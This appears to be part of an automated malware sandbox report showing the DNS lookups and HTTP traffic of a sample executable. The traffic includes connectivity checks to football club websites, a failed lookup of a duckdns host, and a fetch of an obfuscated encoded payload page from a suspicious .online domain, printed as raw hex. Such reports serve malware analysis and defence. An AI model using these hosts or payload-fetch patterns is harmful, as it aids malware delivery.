                                                                                                                                                                                        Mar 2, 2021 20:41:00.859214067 CET8.8.8.8192.168.2.60x3c17No error (0)chelseafc.map.fastly.net151.101.2.133A (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:00.859214067 CET8.8.8.8192.168.2.60x3c17No error (0)chelseafc.map.fastly.net151.101.66.133A (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:00.859214067 CET8.8.8.8192.168.2.60x3c17No error (0)chelseafc.map.fastly.net151.101.130.133A (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:00.859214067 CET8.8.8.8192.168.2.60x3c17No error (0)chelseafc.map.fastly.net151.101.194.133A (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:00.926645041 CET8.8.8.8192.168.2.60x2276No error (0)www.chelseafc.comchelseafc.map.fastly.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:00.926645041 CET8.8.8.8192.168.2.60x2276No error (0)chelseafc.map.fastly.net151.101.2.133A (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:00.926645041 CET8.8.8.8192.168.2.60x2276No error (0)chelseafc.map.fastly.net151.101.66.133A (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:00.926645041 CET8.8.8.8192.168.2.60x2276No error (0)chelseafc.map.fastly.net151.101.130.133A (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:00.926645041 CET8.8.8.8192.168.2.60x2276No error (0)chelseafc.map.fastly.net151.101.194.133A (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:01.093194008 CET8.8.8.8192.168.2.60x1005No error (0)www.chelseafc.comchelseafc.map.fastly.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:01.093194008 CET8.8.8.8192.168.2.60x1005No error (0)chelseafc.map.fastly.net151.101.2.133A (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:01.093194008 CET8.8.8.8192.168.2.60x1005No error (0)chelseafc.map.fastly.net151.101.66.133A (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:01.093194008 CET8.8.8.8192.168.2.60x1005No error (0)chelseafc.map.fastly.net151.101.130.133A (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:01.093194008 CET8.8.8.8192.168.2.60x1005No error (0)chelseafc.map.fastly.net151.101.194.133A (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:01.157641888 CET8.8.8.8192.168.2.60x7beNo error (0)www.chelseafc.comchelseafc.map.fastly.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:01.157641888 CET8.8.8.8192.168.2.60x7beNo error (0)chelseafc.map.fastly.net151.101.2.133A (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:01.157641888 CET8.8.8.8192.168.2.60x7beNo error (0)chelseafc.map.fastly.net151.101.66.133A (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:01.157641888 CET8.8.8.8192.168.2.60x7beNo error (0)chelseafc.map.fastly.net151.101.130.133A (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:01.157641888 CET8.8.8.8192.168.2.60x7beNo error (0)chelseafc.map.fastly.net151.101.194.133A (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:01.352133989 CET8.8.8.8192.168.2.60x6414No error (0)www.manutd.comwww.manutd.com.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:01.407466888 CET8.8.8.8192.168.2.60x753bNo error (0)www.manutd.comwww.manutd.com.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:01.554646015 CET8.8.8.8192.168.2.60x1fe6No error (0)www.manutd.comwww.manutd.com.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:01.634470940 CET8.8.8.8192.168.2.60x7281No error (0)www.manutd.comwww.manutd.com.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:05.076627016 CET8.8.8.8192.168.2.60x9d8bNo error (0)www.mancity.comwww.mancity.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:05.131516933 CET8.8.8.8192.168.2.60x5f9cNo error (0)www.mancity.comwww.mancity.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:05.305687904 CET8.8.8.8192.168.2.60xa326No error (0)www.mancity.comwww.mancity.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:05.360922098 CET8.8.8.8192.168.2.60xbc35No error (0)www.mancity.comwww.mancity.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:05.520545959 CET8.8.8.8192.168.2.60x81eeNo error (0)0k10dk21kkeok2e.online104.21.59.148A (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:05.520545959 CET8.8.8.8192.168.2.60x81eeNo error (0)0k10dk21kkeok2e.online172.67.179.188A (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:06.218075037 CET8.8.8.8192.168.2.60xad70No error (0)www.liverpoolfc.comd2hhwit6pbhmvu.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:06.218075037 CET8.8.8.8192.168.2.60xad70No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.103A (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:06.218075037 CET8.8.8.8192.168.2.60xad70No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.34A (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:06.218075037 CET8.8.8.8192.168.2.60xad70No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.58A (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:06.218075037 CET8.8.8.8192.168.2.60xad70No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.29A (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:06.297781944 CET8.8.8.8192.168.2.60xd783No error (0)www.liverpoolfc.comd2hhwit6pbhmvu.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:06.297781944 CET8.8.8.8192.168.2.60xd783No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.58A (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:06.297781944 CET8.8.8.8192.168.2.60xd783No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.29A (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:06.297781944 CET8.8.8.8192.168.2.60xd783No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.34A (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:06.297781944 CET8.8.8.8192.168.2.60xd783No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.103A (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:06.452909946 CET8.8.8.8192.168.2.60x5af2No error (0)www.liverpoolfc.comd2hhwit6pbhmvu.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:06.452909946 CET8.8.8.8192.168.2.60x5af2No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.29A (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:06.452909946 CET8.8.8.8192.168.2.60x5af2No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.103A (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:06.452909946 CET8.8.8.8192.168.2.60x5af2No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.58A (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:06.452909946 CET8.8.8.8192.168.2.60x5af2No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.34A (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:06.511295080 CET8.8.8.8192.168.2.60xaac8No error (0)www.liverpoolfc.comd2hhwit6pbhmvu.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:06.511295080 CET8.8.8.8192.168.2.60xaac8No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.103A (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:06.511295080 CET8.8.8.8192.168.2.60xaac8No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.29A (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:06.511295080 CET8.8.8.8192.168.2.60xaac8No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.34A (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:06.511295080 CET8.8.8.8192.168.2.60xaac8No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.58A (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:07.513892889 CET8.8.8.8192.168.2.60x119No error (0)www.realmadrid.comrealmadrid.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:07.576818943 CET8.8.8.8192.168.2.60xd69bNo error (0)www.realmadrid.comrealmadrid.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:07.746239901 CET8.8.8.8192.168.2.60x4b7bNo error (0)www.realmadrid.comrealmadrid.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:07.812843084 CET8.8.8.8192.168.2.60x96e1No error (0)www.realmadrid.comrealmadrid.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:18.539558887 CET8.8.8.8192.168.2.60xb58dName error (3)busch.duckdns.orgnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                        Mar 2, 2021 20:41:18.608015060 CET8.8.8.8192.168.2.60x2cf2Name error (3)busch.duckdns.orgnonenoneA (IP address)IN (0x0001)

                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                        • www.chelseafc.com
                                                                                                                                                                                        • 0k10dk21kkeok2e.online
                                                                                                                                                                                        • www.liverpoolfc.com

                                                                                                                                                                                        HTTP Packets

                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        0192.168.2.649719151.101.2.13380C:\Users\user\Desktop\hfLfKDTosA.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        Mar 2, 2021 20:41:00.988303900 CET1084OUTGET / HTTP/1.1
                                                                                                                                                                                        User-Agent: Other
                                                                                                                                                                                        Host: www.chelseafc.com
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Mar 2, 2021 20:41:01.029314995 CET1085INHTTP/1.1 302 Found
                                                                                                                                                                                        Retry-After: 0
                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                        Location: https://www.chelseafc.com/en
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        Date: Tue, 02 Mar 2021 19:41:01 GMT
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding, Accept-Language
                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                        X-Powered-By: Curiosity
                                                                                                                                                                                        X-Geo-Country_code: CH


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        1192.168.2.649729104.21.59.14880C:\Users\user\Desktop\hfLfKDTosA.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        Mar 2, 2021 20:41:05.562596083 CET1768OUTGET /base/2930AD689ACFCD5F8337A7469C74A7E8.html HTTP/1.1
                                                                                                                                                                                        User-Agent: Other
                                                                                                                                                                                        Host: 0k10dk21kkeok2e.online
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Mar 2, 2021 20:41:05.779750109 CET1773INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Tue, 02 Mar 2021 19:41:05 GMT
                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Set-Cookie: __cfduid=d77cc2a8278ce6d8dce7cd4d435d2570e1614714065; expires=Thu, 01-Apr-21 19:41:05 GMT; path=/; domain=.0k10dk21kkeok2e.online; HttpOnly; SameSite=Lax
                                                                                                                                                                                        Last-Modified: Tue, 02 Mar 2021 06:34:34 GMT
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                        cf-request-id: 08960e6ab700004edf103f2000000001
                                                                                                                                                                                        Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=lbbx%2FLsiv0%2Fjj7D1D1ZULW7JJxn9iBnS7UnQE9bZDKMOljcwNg70DxsJ7ORAhILxnFlsbj8gLY5Q%2BzOrn%2FwvNpGDYHe8njW7QhxcU9NnORXLWhdpjKXy"}]}
                                                                                                                                                                                        NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 629d19bdf8d44edf-FRA
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                        Data Raw: 37 63 38 30 0d 0a 3c 70 3e 59 59 67 42 6b 67 6c 55 55 67 6b 67 79 67 6b 67 6b 67 6b 67 55 67 6b 67 6b 67 6b 67 53 4f 4f 67 53 4f 4f 67 6b 67 6b 67 6c 46 55 67 6b 67 6b 67 6b 67 6b 67 6b 67 6b 67 6b 67 4e 55 67 6b 67 6b 67 6b 67 6b 67 6b 67 6b 67 6b 67 6b 67 6b 67 6b 67 6b 67 6b 67 6b 67 6b 67 6b 67 6b 67 6b 67 6b 67 6b 67 6b 67 6b 67 6b 67 6b 67 6b 67 6b 67 6b 67 6b 67 6b 67 6b 67 6b 67 6b 67 6b 67 6b 67 6b 67 6b 67 6c 53 46 67 6b 67 6b 67 6b 67 6c 55 67 79 6c 67 6c 46 4e 67 6c 55 67 6b 67 6c 46 6b 67 42 67 53 6b 4f 67 79 79 67 6c 46 55 67 6c 67 59 4e 67 53 6b 4f 67 79 79 67 46 55 67 6c 6b 55 67 6c 6b 4f 67 6c 6c 4f 67 79 53 67 6c 6c 53 67 6c 6c 55 67 6c 6c 6c 67 6c 6b 79 67 6c 6c 55 67 42 59 67 6c 6b 42 67 79 53 67 42 42 67 42 59 67 6c 6c 6b 67 6c 6c 6b 67 6c 6c 6c 67 6c 6c 4e 67 79 53 67 42 46 67 6c 6b 6c 67 79 53 67 6c 6c 55 67 6c 6c 59 67 6c 6c 6b 67 79 53 67 6c 6b 4f 67 6c 6c 6b 67 79 53 67 4e 46 67 59 42 67 46 79 67 79 53 67 6c 6b 42 67 6c 6c 6c 67 6c 6b 6b 67 6c 6b 6c 67 55 4e 67 6c 79 67 6c 79 67 6c 6b 67 79 4e 67 6b 67 6b 67 6b 67 6b 67 6b 67 6b 67 6b 67 46 6b 67 4e 42 67 6b 67 6b 67 59 4e 67 6c 67 79 67 6b 67 42 59 67 6c 79 46 67 6c 4f 46 67 53 53 4e 67 6b 67 6b 67 6b 67 6b 67 6b 67 6b 67 6b 67 6b 67 53 53 55 67 6b 67 79 55 67 6b 67 6c 6c 67 6c 67 46 6b 67 6b 67 6b 67 59 55 67 53 67 6b 67 6b 67 4e 67 6b 67 6b 67 6b 67
                                                                                                                                                                                        Data Ascii: 7c80<p>YYgBkglUUgkgygkgkgkgUgkgkgkgSOOgSOOgkgkglFUgkgkgkgkgkgkgkgNUgkgkgkgkgkgkgkgkgkgkgkgkgkgkgkgkgkgkgkgkgkgkgkgkgkgkgkgkgkgkgkgkgkgkgkglSFgkgkgkglUgylglFNglUgkglFkgBgSkOgyyglFUglgYNgSkOgyygFUglkUglkOgllOgySgllSgllUglllglkygllUgBYglkBgySgBBgBYgllkgllkglllgllNgySgBFglklgySgllUgllYgllkgySglkOgllkgySgNFgYBgFygySglkBglllglkkglklgUNglyglyglkgyNgkgkgkgkgkgkgkgFkgNBgkgkgYNglgygkgBYglyFglOFgSSNgkgkgkgkgkgkgkgkgSSUgkgyUgkgllglgFkgkgkgYUgSgkgkgNgkgkgkg
                                                                                                                                                                                        Mar 2, 2021 20:41:05.779779911 CET1774INData Raw: 6b 67 6b 67 6b 67 6c 53 4e 67 6c 6b 4f 67 53 67 6b 67 6b 67 79 53 67 6b 67 6b 67 6b 67 6c 53 46 67 53 67 6b 67 6b 67 6b 67 6b 67 6c 4e 67 6b 67 79 53 67 6b 67 6b 67 6b 67 53 67 6b 67 6b 67 55 67 6b 67 6b 67 6b 67 6b 67 6b 67 6b 67 6b 67 4e 67 6b
                                                                                                                                                                                        Data Ascii: kgkgkglSNglkOgSgkgkgySgkgkgkglSFgSgkgkgkgkglNgkgySgkgkgkgSgkgkgUgkgkgkgkgkgkgkgNgkgkgkgkgkgkgkgkglBSgSgkgkgSgkgkgkgkgkgkgSgkgBNglyygkgkglNgkgkglNgkgkgkgkglNgkgkglNgkgkgkgkgkgkglNgkgkgkgkgkgkgkgkgkgkgkgUFglkOgSgkgYOgkgkgkgkglSFgSgkglNUgygkgkgkg
                                                                                                                                                                                        Mar 2, 2021 20:41:05.779802084 CET1776INData Raw: 4e 67 55 6b 67 6c 6c 67 6b 67 6b 67 55 79 67 6c 53 46 67 53 42 67 6b 67 6b 67 55 67 55 6b 67 6c 46 67 6b 67 6b 67 4e 67 55 6b 67 6c 42 67 6b 67 6b 67 4e 67 55 6b 67 6c 53 67 6b 67 6b 67 55 79 67 6c 53 46 67 79 6b 67 6b 67 6b 67 55 67 55 6b 67 53
                                                                                                                                                                                        Data Ascii: NgUkgllgkgkgUyglSFgSBgkgkgUgUkglFgkgkgNgUkglBgkgkgNgUkglSgkgkgUyglSFgykgkgkgUgUkgSkgkgkgNgUkgSlgkgkgNgUkglygkgkgUyglSFgylgkgkgUgUSglNNgUkgOYgkgkglkgUkgSSgkgkgNglllgOFgkgkglkglSFgySgkgkgUgUkgOBgkgkglkglSFgyygkgkgUgllOgNkgkgkglkglSFgyUgkgkgUgUSg
                                                                                                                                                                                        Mar 2, 2021 20:41:05.779818058 CET1777INData Raw: 53 4f 67 6b 67 6b 67 55 79 67 55 53 67 55 4e 67 6b 67 53 4f 55 67 42 67 6b 67 6b 67 6c 4e 4f 67 6c 55 67 6b 67 6b 67 53 59 67 55 53 67 55 4e 67 6b 67 53 4f 55 67 42 67 6b 67 6b 67 6c 6c 4f 67 6c 55 55 67 6b 67 6b 67 6c 6b 67 55 53 67 4e 53 67 6b
                                                                                                                                                                                        Data Ascii: SOgkgkgUygUSgUNgkgSOUgBgkgkglNOglUgkgkgSYgUSgUNgkgSOUgBgkgkgllOglUUgkgkglkgUSgNSgkgSOUgBgkgkgSOUgBglgkgUkgllUgkgkglkgUSglUNgkgSOUgBgkgkglSyglyOgkgkglkgSOUgBgkgkglSyglyUgkgkglkgSOUgBglgkglSyglyUgkgkglkgSOUgSkgUkgSNgkgkgUygUSglUNgkgSOUgBgkgkglSy
                                                                                                                                                                                        Mar 2, 2021 20:41:05.779835939 CET1778INData Raw: 6b 67 53 4f 55 67 6c 55 67 55 67 6b 67 4f 4e 67 4f 4e 67 6b 67 6b 67 6b 67 53 4f 55 67 6c 79 67 55 67 6b 67 55 6b 67 53 79 67 6b 67 6b 67 6c 6b 67 53 4f 55 67 6c 55 67 4f 67 6b 67 53 4f 55 67 6c 53 67 4f 67 6b 67 55 6b 67 53 55 67 6b 67 6b 67 6c
                                                                                                                                                                                        Data Ascii: kgSOUglUgUgkgONgONgkgkgkgSOUglygUgkgUkgSygkgkglkgSOUglUgOgkgSOUglSgOgkgUkgSUgkgkglkgSOUglSgSgkgUkgSOgkgkglkgSlFgSOUglUgNgkgSOUglSgygkgSOUglSgNgkgUkgSNgkgkglkglllgSYgkgkglkgyFgkgSOUglygUgkgUkgSFgkgkglkgSOUglUgYgkgSOUglSgYgkgOFglYFgSOOgSOOgSOOgS
                                                                                                                                                                                        Mar 2, 2021 20:41:05.779849052 CET1780INData Raw: 67 53 4f 4f 67 53 53 6c 67 6c 59 67 6b 67 6b 67 6b 67 53 4f 55 67 6c 79 67 55 67 6b 67 53 4f 55 67 53 53 67 53 67 6b 67 6b 67 53 59 67 6c 6c 6c 67 53 42 67 6b 67 6b 67 6c 6b 67 6b 67 53 53 6b 67 53 4f 55 67 6c 53 67 79 67 6b 67 6c 6c 6c 67 79 6b
                                                                                                                                                                                        Data Ascii: gSOOgSSlglYgkgkgkgSOUglygUgkgSOUgSSgSgkgkgSYglllgSBgkgkglkgkgSSkgSOUglSgygkglllgykgkgkglkgSOUglUgkgkgONgkgkgkgkgSOUglSgkgkgUSgkgkglglNgkgkgSgkgSFgkglkNglyUgkglYgkgkgkgkgSYgUFgSgkglYUgkgkgkglgkgkglYgkgllUglOYgkgkgllSgSOUglUglgkgllUglBlgkgkgllSg
                                                                                                                                                                                        Mar 2, 2021 20:41:05.779864073 CET1781INData Raw: 67 6c 6c 53 67 53 4f 55 67 6c 55 67 53 67 6b 67 6c 6c 4f 67 53 6b 67 6b 67 6b 67 6c 6b 67 53 4f 55 67 6c 55 67 79 67 6b 67 53 4f 55 67 6c 53 67 6c 67 6b 67 55 6b 67 6c 67 6b 67 6b 67 55 79 67 6c 6c 6c 67 53 53 67 6b 67 6b 67 6c 6b 67 53 4f 55 67
                                                                                                                                                                                        Data Ascii: gllSgSOUglUgSgkgllOgSkgkgkglkgSOUglUgygkgSOUglSglgkgUkglgkgkgUyglllgSSgkgkglkgSOUglUgUgkgONgONgkgkgkgSOUglygUgkgUkgSygkgkglkgSOUglUgOgkgSOUglSgOgkgUkgSUgkgkglkgSOUglSgSgkgUkgSOgkgkglkgSlFgSOUglUgNgkgSOUglSgygkgSOUglSgNgkgUkgSNgkgkglkglllgSYgkg
                                                                                                                                                                                        Mar 2, 2021 20:41:05.779882908 CET1782INData Raw: 67 6b 67 6b 67 6c 6b 67 79 46 67 6b 67 53 4f 55 67 6c 79 67 55 67 6b 67 55 6b 67 53 46 67 6b 67 6b 67 6c 6b 67 53 4f 55 67 6c 55 67 59 67 6b 67 53 4f 55 67 6c 53 67 59 67 6b 67 4f 46 67 6c 59 46 67 53 4f 4f 67 53 4f 4f 67 53 4f 4f 67 53 53 6c 67
                                                                                                                                                                                        Data Ascii: gkgkglkgyFgkgSOUglygUgkgUkgSFgkgkglkgSOUglUgYgkgSOUglSgYgkgOFglYFgSOOgSOOgSOOgSSlglYgkgkgkgSOUglygUgkgSOUgSSgSgkgkgSYglllgSBgkgkglkgkgSSkgSOUglSgygkglllgykgkgkglkgSOUglUgkgkgONgkgkgkgkgSOUglSgkgkgUSgkgkglglNgkgkgSgkgSFgkglkNglyUgkglYgkgkgkgkgS
                                                                                                                                                                                        Mar 2, 2021 20:41:05.779988050 CET1784INData Raw: 67 6b 67 6b 67 53 59 67 55 46 67 53 67 6b 67 6c 59 55 67 6b 67 6b 67 6b 67 6c 67 6b 67 6b 67 6c 59 67 6b 67 6c 6c 55 67 6c 59 4f 67 6c 67 6b 67 6c 6c 53 67 53 4f 55 67 6c 55 67 6c 67 6b 67 6c 6c 55 67 6c 46 59 67 6c 67 6b 67 6c 6c 53 67 53 4f 55
                                                                                                                                                                                        Data Ascii: gkgkgSYgUFgSgkglYUgkgkgkglgkgkglYgkgllUglYOglgkgllSgSOUglUglgkgllUglFYglgkgllSgSOUglUgSgkgllOgSkgkgkglkgSOUglUgygkgSOUglSglgkgUkglgkgkgUyglllgSSgkgkglkgSOUglUgUgkgONgONgkgkgkgSOUglygUgkgUkgSygkgkglkgSOUglUgOgkgSOUglSgOgkgUkgSUgkgkglkgSOUglSgSg
                                                                                                                                                                                        Mar 2, 2021 20:41:05.780006886 CET1785INData Raw: 67 6c 53 67 53 67 6b 67 55 6b 67 53 4f 67 6b 67 6b 67 6c 6b 67 53 6c 46 67 53 4f 55 67 6c 55 67 4e 67 6b 67 53 4f 55 67 6c 53 67 79 67 6b 67 53 4f 55 67 6c 53 67 4e 67 6b 67 55 6b 67 53 4e 67 6b 67 6b 67 6c 6b 67 6c 6c 6c 67 53 59 67 6b 67 6b 67
                                                                                                                                                                                        Data Ascii: glSgSgkgUkgSOgkgkglkgSlFgSOUglUgNgkgSOUglSgygkgSOUglSgNgkgUkgSNgkgkglkglllgSYgkgkglkgyFgkgSOUglygUgkgUkgSFgkgkglkgSOUglUgYgkgSOUglSgYgkgOFglYFgSOOgSOOgSOOgSSlglYgkgkgkgSOUglygUgkgSOUgSSgSgkgkgSYglllgSBgkgkglkgkgSSkgSOUglSgygkglllgykgkgkglkgSOU
                                                                                                                                                                                        Mar 2, 2021 20:41:05.780662060 CET1787INData Raw: 53 4f 55 67 6c 55 67 6b 67 6b 67 4f 4e 67 6b 67 6b 67 6b 67 6b 67 53 4f 55 67 6c 53 67 6b 67 6b 67 55 53 67 6b 67 6b 67 6c 67 6c 4e 67 6b 67 6b 67 53 67 6b 67 53 46 67 6b 67 6c 6b 4e 67 6c 79 55 67 6b 67 6c 59 67 6b 67 6b 67 6b 67 6b 67 53 59 67
                                                                                                                                                                                        Data Ascii: SOUglUgkgkgONgkgkgkgkgSOUglSgkgkgUSgkgkglglNgkgkgSgkgSFgkglkNglyUgkglYgkgkgkgkgSYgUFgSgkglYUgkgkgkglgkgkglYgkgllUgBOgSgkgllSgSOUglUglgkgllUglSlgSgkgllSgSOUglUgSgkgllOgSkgkgkglkgSOUglUgygkgSOUglSglgkgUkglgkgkgUyglllgSSgkgkglkgSOUglUgUgkgONgONgk


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        2192.168.2.64973199.86.159.10380C:\Users\user\Desktop\hfLfKDTosA.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        Mar 2, 2021 20:41:06.343461037 CET2316OUTGET / HTTP/1.1
                                                                                                                                                                                        User-Agent: Other
                                                                                                                                                                                        Host: www.liverpoolfc.com
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Mar 2, 2021 20:41:06.386405945 CET2317INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                        Server: CloudFront
                                                                                                                                                                                        Date: Tue, 02 Mar 2021 19:41:06 GMT
                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                        Content-Length: 183
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Location: https://www.liverpoolfc.com/
                                                                                                                                                                                        X-Cache: Redirect from cloudfront
                                                                                                                                                                                        Via: 1.1 41ef3b5e61707f8600cd12eaad85b049.cloudfront.net (CloudFront)
                                                                                                                                                                                        X-Amz-Cf-Pop: MXP64-C2
                                                                                                                                                                                        X-Amz-Cf-Id: YirEnnuzaotXCUkFjgOdgFRznl4kKitKB9Nq-sT3oDxeOIYftwO1oQ==
                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


                                                                                                                                                                                        HTTPS Packets

                                                                                                                                                                                        TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
